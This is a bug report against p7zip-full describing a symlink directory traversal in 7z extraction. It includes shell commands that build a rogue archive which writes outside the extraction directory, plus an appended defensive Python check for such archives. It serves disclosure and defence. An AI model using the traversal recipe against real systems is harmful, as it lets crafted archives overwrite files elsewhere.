Package: p7zip-full
Version: 9.20.1~dfsg.1-4
Tags: security
7z (and 7zr) is susceptible to a directory traversal vulnerability.
While extracting an archive, it will extract symlinks and then follow
them if they are referenced in further entries. This can be exploited by
a rogue archive to write files outside the current directory.
Example:
1) create a sample archive:

    # first entry: a symlink named "dir" pointing outside the extraction directory
    ln -s /tmp dir
    7z a test.7z dir
    rm dir
    # second entry: a regular file whose path goes through "dir"
    mkdir dir
    echo hello > dir/file
    7z a test.7z dir/file
    rm -r dir

2) test it:

    7z x test.7z
This will create a symlink "dir" in the current directory and a file
"/tmp/file".
This can also be exploited through zip, arj and maybe other archives.
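Added illustration, not part of this report or of p7zip: a Python simulation of the check a safe extractor needs for archives like the one above. It resolves each entry's path through the symlinks that earlier entries would already have created and skips any entry that would land outside the destination; the Entry class, the sample entries and the destination path are assumptions made for the example.

```python
import posixpath
from dataclasses import dataclass
from typing import Optional

# Constructed model of an archive entry (hypothetical, not 7z's own API):
# the path stored in the archive and, for symlink entries, the link target.
@dataclass
class Entry:
    path: str
    symlink_target: Optional[str] = None

def _resolve(path: str, base: str, links: dict, depth: int = 0) -> str:
    """Resolve `path` starting at `base`, following symlinks that earlier
    entries would already have created (pure simulation, nothing touches disk)."""
    if depth > 40:                       # guard against symlink loops
        raise ValueError("too many levels of symbolic links")
    cur = "/" if posixpath.isabs(path) else base
    for part in path.split("/"):
        if part in ("", "."):
            continue
        cur = posixpath.normpath(posixpath.join(cur, part))   # ".." is handled here
        if cur in links:                 # this component is a symlink created earlier
            cur = _resolve(links[cur], posixpath.dirname(cur), links, depth + 1)
    return cur

def plan_safe_extraction(entries, dest):
    """Return [(archive path, 'extract' | 'skip', resolved path)].
    An entry is skipped when the path it would really write to, after following
    symlinks from earlier entries, lies outside `dest`."""
    dest = posixpath.normpath(dest)
    links = {}                           # resolved symlink path -> target
    plan = []
    for e in entries:
        resolved = _resolve(e.path, dest, links)
        inside = resolved == dest or resolved.startswith(dest + "/")
        if not inside:
            plan.append((e.path, "skip", resolved))
            continue
        if e.symlink_target is not None:
            links[resolved] = e.symlink_target
        plan.append((e.path, "extract", resolved))
    return plan

if __name__ == "__main__":
    # Constructed entries mirroring the report: symlink "dir" -> /tmp, then "dir/file".
    rogue = [Entry("dir", symlink_target="/tmp"), Entry("dir/file")]
    for row in plan_safe_extraction(rogue, "/home/user/out"):
        print(row)
```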
--
Alexander Cherepanov